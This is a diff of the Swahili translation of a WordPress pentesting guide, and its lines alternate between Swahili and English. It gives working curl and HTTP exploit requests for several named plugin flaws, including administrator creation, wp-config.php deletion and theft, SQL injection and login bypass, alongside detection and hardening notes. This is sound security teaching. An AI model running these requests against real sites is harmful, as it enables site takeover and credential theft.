+Inawezekana pia kufichua functions kutoka wordpress kwa kusajili REST API kwa kutumia function `register_rest_route`:
 ```php
 register_rest_route(
 $this->namespace, '/get/', array(
@@ -363,21 +363,21 @@ $this->namespace, '/get/', array(
 )
 );
 ```
-The `permission_callback` ni callback kwa function inayothibitisha ikiwa mtumiaji fulani ameidhinishwa kuita API method.
+The `permission_callback` ni callback ya kazi inayokagua ikiwa mtumiaji aliyotajwa ameidhinishwa kuita njia ya API.
 
-**Ikiwa function iliyojengwa ndani `__return_true` itatumika, itapita tu ukaguzi wa ruhusa za mtumiaji.**
+**Ikiwa kazi ya ndani ya kujengwa `__return_true` itatumiwa, itapita tu ukaguzi wa ruhusa za mtumiaji.**
 
-- **Ufikiaji wa moja kwa moja wa faili ya php**
+- **Ufikiaji wa moja kwa moja wa faili la php**
 
-Kama kawaida, Wordpress inatumia PHP na faili ndani ya plugin zinaweza kupatikana moja kwa moja kupitia wavuti. Kwa hivyo, ikiwa plugin inafichua utendaji wenye udhaifu unaozinduliwa kwa kuingia tu kwenye faili, mtumiaji yeyote ataweza kuutumia.
+Hakika, Wordpress inatumia PHP na faili ndani ya plugins zinaweza kupatikana moja kwa moja kutoka kwenye wavuti. Hivyo, endapo plugin inaonyesha utendaji wenye udhaifu unaochochewa tu kwa kufungua faili hilo, utakuwa rahisi kutumiwa na mtumiaji yeyote.
 
 ### Trusted-header REST impersonation (WooCommerce Payments ≤ 5.6.1)
 
-Baadhi ya plugins zinafanya “trusted header” shortcuts kwa ajili ya internal integrations au reverse proxies na kisha hutumia header hiyo kuweka muktadha wa mtumiaji wa sasa kwa maombi ya REST. Ikiwa header haitafungwi cryptographically na sehemu ya juu (upstream component), mshambuliaji anaweza kuiga (spoof) na kufikia routes za REST zenye ruhusa kama administrator.
+Baadhi ya plugins hutekeleza “trusted header” njia za mkato kwa integrasiyo za ndani au reverse proxies kisha hutumia header hiyo kuweka muktadha wa mtumiaji wa sasa kwa maombi ya REST. Ikiwa header haifungwi kwa njia ya kriptografia kwenye ombi na sehemu ya juu, mshambuliaji anaweza kuifanya spoof na kufikia routes za REST zenye marufuku kama administrator.
 
-- Athari: kuinuka kwa mamlaka bila uthibitisho hadi admin kwa kuunda msimamizi mpya kupitia core users REST route.
-- Example header: `X-Wcpay-Platform-Checkout-User: 1` (inafanya user ID 1, kawaida akaunti ya msimamizi wa kwanza).
-- Exploited route: `POST /wp-json/wp/v2/users` kwa role array yenye ruhusa za juu.
+- Athari: kuinuka kwa ruhusa bila uthibitisho hadi admin kwa kuunda administrator mpya kupitia core users REST route.
+- Mfano wa header: `X-Wcpay-Platform-Checkout-User: 1` (lazimisha user ID 1, kawaida akaunti ya kwanza ya administrator).
+- Njia iliyotumiwa: `POST /wp-json/wp/v2/users` na array ya role iliyoongezwa.
 
 PoC
 ```http
@@ -391,31 +391,31 @@ Content-Length: 114
 
 {"username": "honeypot", "email": "wafdemo@patch.stack", "password": "demo", "roles": ["administrator"]}
 ```
-Kwa nini inafanya kazi
+Why it works
 
-- Plugin inaweka header inayodhibitiwa na mteja kwenye authentication state na inaruka capability checks.
-- WordPress core inatarajia `create_users` capability kwa route hii; hack ya plugin inaitikisa kwa kuweka moja kwa moja current user context kutoka kwenye header.
+- Plugin inamepanga header inayodhibitiwa na mteja kwenye hali ya uthibitisho na inapuuza ukaguzi wa capability.
+- Msingi wa WordPress unatarajia `create_users` capability kwa route hii; hack ya plugin inalipa kizuizi hicho kwa kuweka moja kwa moja muktadha wa mtumiaji wa sasa kutoka kwa header.
 
-Viashiria vya mafanikio vinavyotarajiwa
+Expected success indicators
 
-- HTTP 201 na mwili wa JSON unaelezea user iliyoundwa.
-- Mtumiaji mpya wa admin unaoonekana katika `wp-admin/users.php`.
+- HTTP 201 with a JSON body describing the created user.
+- Mtumiaji mpya wa admin anaonekana katika `wp-admin/users.php`.
 
-Orodha ya kugundua
+Detection checklist
 
-- Tumia grep kutafuta `getallheaders()`, `$_SERVER['HTTP_...']`, au vendor SDKs zinazosasisha custom headers kuweka user context (mfano, `wp_set_current_user()`, `wp_set_auth_cookie()`).
-- Pitia REST registrations kwa privileged callbacks ambazo hazina ukaguzi imara wa `permission_callback` na badala yake zinategemea request headers.
-- Tazama matumizi ya core user-management functions (`wp_insert_user`, `wp_create_user`) ndani ya REST handlers ambazo zinalindwa tu kwa thamani za header.
+- Grep for `getallheaders()`, `$_SERVER['HTTP_...']`, or vendor SDKs that read custom headers to set user context (e.g., `wp_set_current_user()`, `wp_set_auth_cookie()`).
+- Review REST registrations for privileged callbacks that lack robust `permission_callback` checks and instead rely on request headers.
+- Look for usages of core user-management functions (`wp_insert_user`, `wp_create_user`) inside REST handlers that are gated only by header values.
 
-### Kuondolewa kwa faili bila uthibitisho kupitia wp_ajax_nopriv (Litho Theme <= 3.0)
+### Unauthenticated Arbitrary File Deletion via wp_ajax_nopriv (Litho Theme <= 3.0)
 
-Themes na plugins za WordPress mara nyingi hutoa AJAX handlers kupitia hooks `wp_ajax_` na `wp_ajax_nopriv_`. Wakati toleo la **_nopriv_** linapotumiwa **callback inakuwa inafikiwa na wageni wasioingia**, kwa hivyo kitendo chochote nyeti kinapaswa pia kutekeleza:
+Mandhari na plugins za WordPress mara nyingi huweka wazi AJAX handlers kupitia hooks `wp_ajax_` na `wp_ajax_nopriv_`. Wakati toleo **_nopriv_** linapotumika **callback inakuwa inafikiwa na wageni wasio na uthibitisho**, kwa hivyo kitendo chochote nyeti kinapaswa pia kutekelezwa:
 
-1. Ukaguzi wa **capability** (mf. `current_user_can()` au angalau `is_user_logged_in()`), na
-2. **CSRF nonce** iliyoathibitishwa na `check_ajax_referer()` / `wp_verify_nonce()`, na
-3. **Usafishaji / uthibitishaji mkali wa input**.
+1. Ukaguzi wa **capability** (mfano `current_user_can()` au angalau `is_user_logged_in()`), na
+2. CSRF nonce iliyothibitishwa kwa `check_ajax_referer()` / `wp_verify_nonce()`, na
+3. **Uchujaji / uthibitishaji madhubuti wa ingizo**.
 
-The Litho multipurpose theme (< 3.1) ilisahau udhibiti hizo 3 katika kipengele cha *Remove Font Family* na mwishowe ikatuma msimbo ufuatao (umepunguzwa):
+Mandhari ya Litho multipurpose (< 3.1) ilisahau udhibiti hizo 3 katika kipengele cha *Remove Font Family* na hatimaye ilitoa code ifuatayo (imefupishwa):
 ```php
 function litho_remove_font_family_action_data() {
 if ( empty( $_POST['fontfamily'] ) ) {
@@ -438,33 +438,33 @@ Masuala yaliyotokana na kipande hiki:
 
 * **Ufikiaji bila uthibitisho** – hook ya `wp_ajax_nopriv_` imejisajili.
 * **Hakuna ukaguzi wa nonce / capability** – mgeni yeyote anaweza kufikia endpoint.
-* **Hakuna kusafishwa kwa path** – mfuatano uliodhibitiwa na mtumiaji `fontfamily` unaunganishwa kwenye njia ya filesystem bila kuchujwa, kuruhusu `../../` traversal ya kawaida.
+* **Hakuna kusafishwa kwa njia** – kamba inayodhibitiwa na mtumiaji `fontfamily` inaunganishwa kwenye njia ya filesystem bila kuchujwa, ikiruhusu classic `../../` traversal.
 
 #### Utekelezaji
 
-Mshambuliaji anaweza kufuta faili yoyote au saraka **chini ya saraka ya msingi ya uploads** (kwa kawaida `<wp-root>/wp-content/uploads/`) kwa kutuma ombi moja la HTTP POST:
+Mshambuliaji anaweza kufuta faili au saraka yoyote **chini ya uploads base directory** (kawaida `<wp-root>/wp-content/uploads/`) kwa kutuma ombi moja la HTTP POST:
 ```bash
 curl -X POST https://victim.com/wp-admin/admin-ajax.php \
 -d 'action=litho_remove_font_family_action_data' \
 -d 'fontfamily=../../../../wp-config.php'
 ```
-Because `wp-config.php` lives outside *uploads*, four `../` sequences are enough on a default installation.  Deleting `wp-config.php` forces WordPress into the *installation wizard* on the next visit, enabling a full site take-over (the attacker merely supplies a new DB configuration and creates an admin user).
+Kwa sababu `wp-config.php` iko nje ya *uploads*, mfululizo wa `../` mara nne unatosha kwenye usakinishaji wa kawaida. Kufuta `wp-config.php` kunalazimisha WordPress kuingia kwenye *msaidizi wa usanidi* kwenye ziara inayofuata, na kuwezesha kuchukua tovuti kwa ukamilifu (mshambuliaji anatolewa tu usanidi mpya wa DB na kuunda mtumiaji admin).
 
-Malengo mengine yenye athari ni faili za `.php` za plugin/theme (kuvunja plugin za usalama) au sheria za `.htaccess`.
+Other impactful targets include plugin/theme `.php` files (to break security plugins) or `.htaccess` rules.
 
 #### Detection checklist
 
-* Kila callback ya `add_action( 'wp_ajax_nopriv_...')` inayoitisha filesystem helpers (`copy()`, `unlink()`, `$wp_filesystem->delete()`, n.k.).
-* Kuambatanisha input ya mtumiaji isiyosafishwa ndani ya paths (tazama `$_POST`, `$_GET`, `$_REQUEST`).
-* Kukosekana kwa `check_ajax_referer()` na `current_user_can()`/`is_user_logged_in()`.
+* Kila callback ya `add_action( 'wp_ajax_nopriv_...')` inayoitisha filesystem helpers (`copy()`, `unlink()`, `$wp_filesystem->delete()`, etc.).
+* Kuunganisha maingizo ya mtumiaji ambayo hayaja safishwa katika paths (tazama `$_POST`, `$_GET`, `$_REQUEST`).
+* Ukosefu wa `check_ajax_referer()` na `current_user_can()`/`is_user_logged_in()`.
 
 ---
 
-### Kuinua mamlaka kupitia urejeshaji wa role zilizobaki na kukosekana kwa idhini (ASE "View Admin as Role")
+### Privilege escalation via stale role restoration and missing authorization (ASE "View Admin as Role")
 
-Mengi ya plugins hutekeleza kipengele cha "view as role" au kubadilisha role kwa muda kwa kuhifadhi role(s) za awali katika user meta ili ziweze kurejeshwa baadaye. Ikiwa njia ya urejeshaji inategemea tu vigezo vya ombi (mf., `$_REQUEST['reset-for']`) na orodha inayodumishwa na plugin bila kuangalia capabilities na nonce halali, hii inageuka kuwa kuinua mamlaka kwa mtazamo wima.
+Many plugins implement a "view as role" or temporary role-switching feature by saving the original role(s) in user meta so they can be restored later. If the restoration path relies only on request parameters (e.g., `$_REQUEST['reset-for']`) and a plugin-maintained list without checking capabilities and a valid nonce, this becomes a vertical privilege escalation.
 
-Mfano wa maisha halisi ulipatikana katika Admin and Site Enhancements (ASE) plugin (≤ 7.6.2.1). Tawi la reset liliurejesha role kulingana na `reset-for=<username>` ikiwa jina la mtumiaji lilionekana katika array ya ndani `$options['viewing_admin_as_role_are']`, lakini halikufanya ukaguzi wa `current_user_can()` wala uhakiki wa nonce kabla ya kuondoa role za sasa na kuziwekea tena role zilizohifadhiwa kutoka user meta `_asenha_view_admin_as_original_roles`:
+Mfano wa dunia halisi ulipatikana katika Admin and Site Enhancements (ASE) plugin (≤ 7.6.2.1). Tawi la reset liliurejesha role kulingana na `reset-for=<username>` ikiwa jina la mtumiaji lilitokea katika array ya ndani `$options['viewing_admin_as_role_are']`, lakini halikufanya ukaguzi wa `current_user_can()` wala uthibitisho wa nonce kabla ya kuondoa role za sasa na kuongeza tena role zilizohifadhiwa kutoka user meta `_asenha_view_admin_as_original_roles`:
 ```php
 // Simplified vulnerable pattern
 if ( isset( $_REQUEST['reset-for'] ) ) {
@@ -479,13 +479,13 @@ foreach ( $orig as $r ) { $u->add_role( $r ); }
 }
 }
 ```
-Kwa nini inaweza kutumika
+Why it’s exploitable
 
-- Inaamini `$_REQUEST['reset-for']` na chaguo la plugin bila idhinisho upande wa seva.
-- Ikiwa mtumiaji alikuwa na ruhusa za juu zilizohifadhiwa katika `_asenha_view_admin_as_original_roles` na baadaye alishushwa hadhi, anaweza kuzirejesha kwa kufikia reset path.
-- Katika baadhi ya deployments, mtumiaji yeyote aliyethibitishwa angeweza kusababisha reset kwa jina la mtumiaji mwingine ambalo bado lipo katika `viewing_admin_as_role_are` (idhinishaji lililovunjika).
+- Inaamini `$_REQUEST['reset-for']` na chaguo la plugin bila uthibitisho upande wa seva.
+- Ikiwa mtumiaji hapo awali alikuwa na ruhusa za juu zilizohifadhiwa katika `_asenha_view_admin_as_original_roles` na alipunguzwa, anaweza kuzirejesha kwa kufikia reset path.
+- Katika baadhi ya usanikishaji, mtumiaji yeyote aliyethibitishwa anaweza kusababisha reset kwa jina la mtumiaji mwingine ambalo bado lipo katika `viewing_admin_as_role_are` (idhinishaji lililovunjika).
 
-Matumizi ya udhaifu (mfano)
+Utekelezaji wa shambulio (mfano)
 ```bash
 # While logged in as the downgraded user (or any auth user able to trigger the code path),
 # hit any route that executes the role-switcher logic and include the reset parameter.
@@ -493,23 +493,23 @@ Matumizi ya udhaifu (mfano)
 curl -s -k -b 'wordpress_logged_in=...' \
 'https://victim.example/wp-admin/?reset-for=<your_username>'
 ```
-On vulnerable builds this removes current roles and re-adds the saved original roles (e.g., `administrator`), effectively escalating privileges.
+Katika builds zilizo hatarini, hii inaondoa current roles na kuzirudisha tena saved original roles (mfano, `administrator`), na kwa ufanisi escalating privileges.
 
-Orodha ya kugundua
+Detection checklist
 
-- Angalia vipengele vya kubadilisha role vinavyohifadhi “original roles” katika user meta (mfano, `_asenha_view_admin_as_original_roles`).
-- Tambua njia za reseti/urejesho ambazo:
-  - Soma majina ya watumiaji kutoka `$_REQUEST` / `$_GET` / `$_POST`.
-  - Badilisha roles kupitia `add_role()` / `remove_role()` bila `current_user_can()` na `wp_verify_nonce()` / `check_admin_referer()`.
-  - Rudisha idhini kwa kuzingatia array ya chaguo la plugin (mfano, `viewing_admin_as_role_are`) badala ya uwezo wa mhusika.
+- Tazama role-switching features ambazo zinaweka “original roles” ndani ya user meta (mfano, `_asenha_view_admin_as_original_roles`).
+- Tambua reset/restore paths ambazo:
+- Kusoma majina ya watumiaji kutoka `$_REQUEST` / `$_GET` / `$_POST`.
+- Badilisha roles kupitia `add_role()` / `remove_role()` bila `current_user_can()` na `wp_verify_nonce()` / `check_admin_referer()`.
+- Kuruhusu kwa msingi wa plugin option array (mfano, `viewing_admin_as_role_are`) badala ya capabilities za mhusika.
 
 ---
 
-### Kuongezeka kwa ruhusa kwa watumiaji wasioathibitishwa kupitia cookie‑trusted user switching kwenye hook ya umma `init` (Service Finder “sf-booking”)
+### Unauthenticated privilege escalation via cookie‑trusted user switching on public init (Service Finder “sf-booking”)
 
-Baadhi ya plugins huunganisha user-switching helpers kwenye hook ya umma `init` na hutumia utambulisho kutoka kwa cookie inayodhibitiwa na mteja. Ikiwa msimbo unaita `wp_set_auth_cookie()` bila kuthibitisha authentication, capability na nonce halali, mgeni yeyote asiyetambulishwa anaweza kulazimisha login kama user ID yeyote. 
+Baadhi ya plugins huhusisha user-switching helpers na public `init` hook na hupata utambulisho kutoka kwa cookie inayoendeshwa na mteja. Ikiwa code inaita `wp_set_auth_cookie()` bila kuthibitisha authentication, capability na nonce halali, mgeni yeyote asiye na uthibitisho anaweza kulazimisha login kama arbitrary user ID.
 
-Mfano wa kawaida wenye udhaifu (umeshindwa kidogo kutoka Service Finder Bookings ≤ 6.1):
+Typical vulnerable pattern (simplified from Service Finder Bookings ≤ 6.1):
 ```php
 function service_finder_submit_user_form(){
 if ( isset($_GET['switch_user']) && is_numeric($_GET['switch_user']) ) {
@@ -538,11 +538,11 @@ wp_die('Original user not found.');
 wp_die('No original user found to switch back to.');
 }
 ```
-Why it’s exploitable
+Kwa nini inaweza kutumiwa
 
-- Hook ya `init` ya umma inafanya handler ipatikane kwa unauthenticated users (no `is_user_logged_in()` guard).
-- Kitambulisho kinatokana na cookie inayoweza kubadilishwa na mteja (`original_user_id`).
-- Simu ya moja kwa moja kwa `wp_set_auth_cookie($uid)` inamwingiza muombaji kama mtumiaji huyo bila capability/nonce checks.
+- Hook ya umma `init` inafanya handler upatikane kwa watumiaji wasiothibitishwa (hakuna kinga ya `is_user_logged_in()`).
+- Utambulisho unatokana na cookie inayoweza kubadilishwa na mteja (`original_user_id`).
+- Kuitwa moja kwa moja kwa `wp_set_auth_cookie($uid)` hufanya mwombaji aingie kama mtumiaji huyo bila ukaguzi wowote wa capability/nonce.
 
 Exploitation (unauthenticated)
 ```http
@@ -554,32 +554,32 @@ Connection: close
 ```
 ---
 
-### Mambo ya WAF kwa CVEs za WordPress/plugin
+### WAF considerations for WordPress/plugin CVEs
 
-WAF za generic za edge/server zimeelekezwa kwa mifumo pana (SQLi, XSS, LFI). Matatizo mengi ya high‑impact ya WordPress/plugin ni hitilafu maalum za logic/auth za application ambazo zinaonekana kama trafiki isiyo hatari isipokuwa engine itakapotambua routes za WordPress na semantics za plugin.
+WAFs za edge/server za kawaida zimewekwa kwa mifumo pana (SQLi, XSS, LFI). Mengi ya mdudu wa WordPress/plugin wenye athari kubwa ni bug za mantiki/uthibitisho za programu ambazo zinaonekana kama trafiki isiyo hatari isipokuwa engine inafahamu routes za WordPress na semantics za plugin.
 
-Vidokezo vya kushambulia
+Offensive notes
 
 - Lenga endpoints maalum za plugin kwa payloads safi: `admin-ajax.php?action=...`, `wp-json/<namespace>/<route>`, custom file handlers, shortcodes.
-- Tumia njia zisizo za uthibitisho kwanza (AJAX `nopriv`, REST with permissive `permission_callback`, public shortcodes). Default payloads mara nyingi zinafanikiwa bila obfuscation.
+- Anzisha kwa njia zisizo za uthibitisho kwanza (AJAX `nopriv`, REST with permissive `permission_callback`, public shortcodes). Payloads za default mara nyingi hufanikiwa bila kufichwa.
 - Mifano ya kawaida yenye athari kubwa: privilege escalation (broken access control), arbitrary file upload/download, LFI, open redirect.
 
-Vidokezo vya ulinzi
+Defensive notes
 
-- Usitegemee saini za generic za WAF kulinda CVEs za plugin. Tekeleza virtual patches maalum za vulnerability kwenye application-layer au sasisha haraka.
-- Tumia positive-security checks ndani ya code (capabilities, nonces, strict input validation) badala ya negative regex filters.
+- Usitegemee saini za WAF za kawaida ili kulinda plugin CVEs. Tekeleza virtual patches maalum kwa tabaka la application kwa ajili ya hitilafu au sasisha haraka.
+- Nenda kwa positive-security checks ndani ya code (capabilities, nonces, strict input validation) badala ya vichujio hasi vya regex.
 
-## Ulinzi wa WordPress
+## WordPress Protection
 
-### Sasisho za kawaida
+### Regular Updates
 
-Hakikisha WordPress, plugins, na themes viko updated. Pia thibitisha kuwa automated updating imewezeshwa katika wp-config.php:
+Hakikisha WordPress, plugins, na themes zimesasishwa. Pia thibitisha kwamba sasisho za moja kwa moja zimewezeshwa katika wp-config.php:
 ```bash
 define( 'WP_AUTO_UPDATE_CORE', true );
 add_filter( 'auto_update_plugin', '__return_true' );
 add_filter( 'auto_update_theme', '__return_true' );
 ```
-Pia, **weka tu plugins na themes za WordPress zinazoweza kuaminika**.
+Pia, **wasakinishe tu WordPress plugins na themes zinazoweza kuaminiwa**.
 
 ### Plugins za Usalama
 
@@ -590,15 +590,15 @@ Pia, **weka tu plugins na themes za WordPress zinazoweza kuaminika**.
 ### **Mapendekezo Mengine**
 
 - Ondoa mtumiaji wa chaguo-msingi **admin**
-- Tumia **nywila zenye nguvu** na **2FA**
-- Kila mara **kagua** **ruhusa** za watumiaji
+- Tumia **nenosiri imara** na **2FA**
+- Mara kwa mara **kagua** **idhinishaji** za watumiaji
 - **Punguza majaribio ya kuingia** ili kuzuia mashambulizi ya Brute Force
-- Badilisha jina la faili **`wp-admin.php`** na ruhusu ufikiaji ndani tu au kutoka kwa anwani za IP maalum.
+- Badili jina la faili **`wp-admin.php`** na ruhusu ufikiaji tu ndani au kutoka anwani za IP maalum.
 
 
-### SQL Injection isiyothibitishwa kupitia uidhinishaji duni (WP Job Portal <= 2.3.2)
+### SQL Injection isiyo na uthibitisho kupitia uhalalishaji usio wa kutosha (WP Job Portal <= 2.3.2)
 
-Plugin ya recruitment ya WP Job Portal ilifunua kazi ya **savecategory** ambayo hatimaye inatekeleza msimbo ufuatao wenye udhaifu ndani ya `modules/category/model.php::validateFormData()`:
+Plugin ya uajiri ya WP Job Portal ilifunua kazi ya **savecategory** ambayo hatimaye inatekeleza msimbo ufuatao wenye hatari ndani ya `modules/category/model.php::validateFormData()`:
 ```php
 $category  = WPJOBPORTALrequest::getVar('parentid');
 $inquery   = ' ';
@@ -610,17 +610,17 @@ $query  = "SELECT max(ordering)+1 AS maxordering FROM "
 ```
 Masuala yaliyotokana na kipande hiki cha msimbo:
 
-1. **Unsanitised user input** – `parentid` inatoka moja kwa moja kutoka kwenye ombi la HTTP.
-2. **String concatenation inside the WHERE clause** – hakuna `is_numeric()` / `esc_sql()` / prepared statement.
-3. **Unauthenticated reachability** – ingawa action inatekelezwa kupitia `admin-post.php`, ukaguzi pekee uliopo ni **CSRF nonce** (`wp_verify_nonce()`), ambao mgeni yeyote anaweza kuipata kutoka kwenye ukurasa wa umma unaojumuisha shortcode `[wpjobportal_my_resumes]`.
+1. **Ingizo la mtumiaji lisilosafishwa** – `parentid` linaelekezwa moja kwa moja kutoka kwa ombi la HTTP.
+2. **String concatenation ndani ya WHERE clause** – hakuna `is_numeric()` / `esc_sql()` / prepared statement.
+3. **Ufikiaji bila uthibitisho** – ingawa hatua inatekelezwa kupitia `admin-post.php`, ukaguzi pekee uliopo ni **CSRF nonce** (`wp_verify_nonce()`), ambao mgeni yeyote anaweza kuupata kutoka ukurasa wa umma unaojumuisha shortcode `[wpjobportal_my_resumes]`.
 
-#### Exploitation
+#### Utekelezaji
 
-1. Chukua nonce mpya:
+1. Pata nonce mpya:
 ```bash
 curl -s https://victim.com/my-resumes/ | grep -oE 'name="_wpnonce" value="[a-f0-9]+' | cut -d'"' -f4
 ```
-2. Weka SQL yoyote kwa kutumia vibaya `parentid`:
+2. Ingiza arbitrary SQL kwa kutumia `parentid`:
 ```bash
 curl -X POST https://victim.com/wp-admin/admin-post.php \
 -d 'task=savecategory' \
@@ -628,20 +628,20 @@ curl -X POST https://victim.com/wp-admin/admin-post.php \
 -d 'parentid=0 OR 1=1-- -' \
 -d 'cat_title=pwn' -d 'id='
 ```
-Jibu linafunua matokeo ya query iliyotiwa au linabadilisha database, kuthibitisha SQLi.
+Jibu linafunua matokeo ya query iliyotiwa au hubadilisha database, kuthibitisha SQLi.
 
 
-### Unauthenticated Arbitrary File Download / Path Traversal (WP Job Portal <= 2.3.2)
+### Ufikiaji bila uthibitisho Arbitrary File Download / Path Traversal (WP Job Portal <= 2.3.2)
 
-Kazi nyingine, **downloadcustomfile**, iliwaruhusu wageni kupakua **any file on disk** kupitia path traversal. Sink dhaifu iko katika `modules/customfield/model.php::downloadCustomUploadedFile()`:
+Kazi nyingine, **downloadcustomfile**, iliruhusu wageni kupakua **faili yoyote kwenye diski** kupitia path traversal. Sink yenye udhaifu iko katika `modules/customfield/model.php::downloadCustomUploadedFile()`:
 ```php
 $file = $path . '/' . $file_name;
 ...
 echo $wp_filesystem->get_contents($file); // raw file output
 ```
-`$file_name` inayodhibitiwa na mshambuliaji na inachanganywa **bila kusafishwa**. Tena, kizuizi pekee ni **CSRF nonce** ambayo inaweza kupatikana kutoka ukurasa wa resume.
+`$file_name` inadhibitiwa na mshambulizi na imeunganishwa **bila kusafishwa**.  Mara nyingine, kizuizi pekee ni **CSRF nonce** ambayo inaweza kupatikana kutoka kwenye ukurasa wa resume.
 
-#### Utekelezaji
+#### Utekelezaji wa shambulio
 ```bash
 curl -G https://victim.com/wp-admin/admin-post.php \
 --data-urlencode 'task=downloadcustomfile' \
@@ -650,13 +650,13 @@ curl -G https://victim.com/wp-admin/admin-post.php \
 --data-urlencode 'entity_id=1' \
 --data-urlencode 'file_name=../../../wp-config.php'
 ```
-Seva inarejesha yaliyomo ya `wp-config.php`, leaking DB credentials and auth keys.
+Seva inajibu na yaliyomo ya `wp-config.php`, leaking DB credentials and auth keys.
 
-## Uchukuzi wa akaunti bila uthibitisho kupitia Social Login AJAX fallback (Jobmonster Theme <= 4.7.9)
+## Kuchukua akaunti bila uthibitisho kupitia Social Login AJAX fallback (Jobmonster Theme <= 4.7.9)
 
-Mandhari/plugini nyingi huja na "social login" helpers zilizoonyeshwa kupitia admin-ajax.php. Ikiwa action ya AJAX bila uthibitisho (wp_ajax_nopriv_...) itaamini client-supplied identifiers wakati provider data inakosekana na kisha itaita wp_set_auth_cookie(), hili linakuwa full authentication bypass.
+Mada/plugini nyingi zinakuja na "social login" helpers zilizofunguliwa kupitia admin-ajax.php. Ikiwa action ya AJAX isiyothibitishwa (wp_ajax_nopriv_...) inamwamini kitambulisho kilichotolewa na mteja wakati data ya provider haipo na kisha inaitisha wp_set_auth_cookie(), hii inakuwa bypass kamili ya uthibitisho.
 
-Mfano wa kawaida wa muundo mbovu (umewekwa kwa ufupi)
+Mfano wa kawaida wa muundo mbovu (imefupishwa)
 ```php
 public function check_login() {
 // ... request parsing ...
@@ -687,15 +687,15 @@ wp_send_json(['status' => 'not_user']);
 ```
 Kwa nini inaweza kutumika
 
-- Unauthenticated reachability via admin-ajax.php (wp_ajax_nopriv_… action).
+- Inafikiwa bila uthibitisho kupitia admin-ajax.php (wp_ajax_nopriv_… action).
 - Hakuna ukaguzi wa nonce/capability kabla ya mabadiliko ya hali.
-- Uthibitisho wa OAuth/OpenID provider umekosekana; default branch inakubali attacker input.
-- get_user_by('email', $_POST['id']) ikifuatiwa na wp_set_auth_cookie($uid) inamtambulisha muomba kama anuani yoyote ya barua pepe iliyopo.
+- Hakuna uthibitisho wa OAuth/OpenID provider; tawi la default linakubali pembejeo ya mdukuji.
+- get_user_by('email', $_POST['id']) ikifuatiwa na wp_set_auth_cookie($uid) inamthibitisha muombaji kama anwani yoyote ya barua pepe iliyopo.
 
-Exploitation (unauthenticated)
+Utekelezaji (bila uthibitisho)
 
-- Mahitaji ya awali: attacker anaweza kufikia /wp-admin/admin-ajax.php na anajua/anakisia anwani halali ya barua pepe ya mtumiaji.
-- Weka provider kuwa thamani isiyoungwa mkono (au uiache) ili kufikia default branch na upitishie id=<victim_email>.
+- Mahitaji: mdukuji anaweza kufikia /wp-admin/admin-ajax.php na anajua/anakisia barua pepe ya mtumiaji halali.
+- Weka provider kuwa thamani isiyoungwa mkono (au uiachie) ili kufikia tawi la default na kupitisha id=<victim_email>.
 ```http
 POST /wp-admin/admin-ajax.php HTTP/1.1
 Host: victim.tld
@@ -708,41 +708,41 @@ action=<vulnerable_social_login_action>&using=bogus&id=admin%40example.com
 curl -i -s -X POST https://victim.tld/wp-admin/admin-ajax.php \
 -d "action=<vulnerable_social_login_action>&using=bogus&id=admin%40example.com"
 ```
-Viashiria vilivyotarajiwa vya mafanikio
+Expected success indicators
 
 - HTTP 200 with JSON body like {"status":"success","message":"Login successfully."}.
 - Set-Cookie: wordpress_logged_in_* for the victim user; subsequent requests are authenticated.
 
-Kupata jina la action
+Finding the action name
 
 - Inspect the theme/plugin for add_action('wp_ajax_nopriv_...', '...') registrations in social login code (e.g., framework/add-ons/social-login/class-social-login.php).
 - Grep for wp_set_auth_cookie(), get_user_by('email', ...) inside AJAX handlers.
 
-Orodha ya kugundua
+Detection checklist
 
 - Web logs showing unauthenticated POSTs to /wp-admin/admin-ajax.php with the social-login action and id=<email>.
 - 200 responses with the success JSON immediately preceding authenticated traffic from the same IP/User-Agent.
 
-Kuimarisha
+Hardening
 
-- Usitafsiri utambulisho kutoka kwa pembejeo ya client. Kubali tu emails/IDs zinazoanzishwa na provider token/ID iliyothibitishwa.
+- Do not derive identity from client input. Only accept emails/IDs originating from a validated provider token/ID.
 - Require CSRF nonces and capability checks even for login helpers; avoid registering wp_ajax_nopriv_ unless strictly necessary.
-- Thibitisha na hakiki majibu ya OAuth/OIDC upande wa server; kataa providers zisizopo au zisizo halali (usiwe na fallback kwa POST id).
-- Fikiria kuzima kwa muda social login au kufanya virtual patching upande wa edge (zuia action iliyo dhaifu) hadi itakaposahihishwa.
+- Validate and verify OAuth/OIDC responses server-side; reject missing/invalid providers (no fallback to POST id).
+- Consider temporarily disabling social login or virtually patching at the edge (block the vulnerable action) until fixed.
 
-Tabia iliyorekebishwa (Jobmonster 4.8.0)
+Patched behaviour (Jobmonster 4.8.0)
 
 - Removed the insecure fallback from $_POST['id']; $user_email must originate from verified provider branches in switch($_POST['using']).
 
-## Unauthenticated privilege escalation via REST token/key minting on predictable identity (OttoKit/SureTriggers ≤ 1.0.82)
+## Kupandishwa kwa ruhusa bila uthibitisho via REST token/key minting on predictable identity (OttoKit/SureTriggers ≤ 1.0.82)
 
-Baadhi ya plugins zinaonyesha REST endpoints zinazotengeneza reusable “connection keys” au tokens bila kuthibitisha uwezo wa aliyeomba. Ikiwa route inathibitisha tu kwa sifa inayoweza kukisia (mfano, username) na haifungishi key kwa user/session yenye capability checks, mshambuliaji yeyote asiye authenticated anaweza kutengeneza key na kuita vitendo vyenye haki za juu (kuunda account ya admin, plugin actions → RCE).
+Baadhi ya plugins huweka wazi REST endpoints zinazotengeneza reusable "connection keys" au tokens bila kuthibitisha uwezo wa mtaarifu. Ikiwa route inafanya authentication kwa sifa inayoweza kubahatishwa tu (mfano, username) na haitoi ufunganaji wa key kwa user/session kwa checks za capability, mshambuliaji asiyeuthibitisha anaweza kutengeneza key na kuiita kwa hatua zenye ruhusa (admin account creation, plugin actions → RCE).
 
 - Vulnerable route (example): sure-triggers/v1/connection/create-wp-connection
 - Flaw: accepts a username, issues a connection key without current_user_can() or a strict permission_callback
 - Impact: full takeover by chaining the minted key to internal privileged actions
 
-PoC – tengeneza connection key na uitumie
+PoC – mint a connection key and use it
 ```bash
 # 1) Obtain key (unauthenticated). Exact payload varies per plugin
 curl -s -X POST "https://victim.tld/wp-json/sure-triggers/v1/connection/create-wp-connection" \
@@ -757,53 +757,53 @@ curl -s -X POST "https://victim.tld/wp-json/sure-triggers/v1/users" \
 --data '{"username":"pwn","email":"p@t.ld","password":"p@ss","role":"administrator"}'
 ```
 Kwa nini inaweza kutumiwa
-- REST route nyeti inalindwa tu na uthibitisho wa utambulisho wa entropi ya chini (username) au permission_callback inayokosekana
-- Hakuna utekelezaji wa capability; funguo iliyotengenezwa inakubaliwa kama bypass ya jumla
